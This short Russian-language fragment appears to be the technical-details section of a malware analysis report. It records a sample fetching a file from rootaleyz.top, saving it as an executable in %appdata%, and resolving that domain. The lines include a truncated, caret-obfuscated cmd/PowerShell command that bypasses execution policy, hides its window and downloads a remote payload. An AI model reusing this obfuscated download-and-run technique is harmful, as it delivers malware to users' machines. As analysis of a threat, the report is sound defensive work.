Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^W^E^RShE^Ll^.^EX^e -^EXe^c^uTi^o^nPolIC^y^ ByPa^s^S^ ^-NO^pROFiLE -w^I^nd^OwstYlE ^H^i^dDE^n^ (nEw-ob^jECT^ SySTe^m^.^neT^.w^eBC^LIeNt)^.^d^owNL^OaD^F^ilE('http://roota...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "p^o^W^E^RShE^Ll^.^EX^e -^EXe^c^uTi^o^nPolIC^y^ ByPa^s^S^ ^-NO^pROFiLE -w^I^nd^OwstYlE ^H^i^dDE^n^ (nEw-ob^jECT^ SySTe^m^.^neT^.w^eBC^LIeNt)^.^d^owNL^OaD^F^ilE('http://roota...' (со скрытым окном)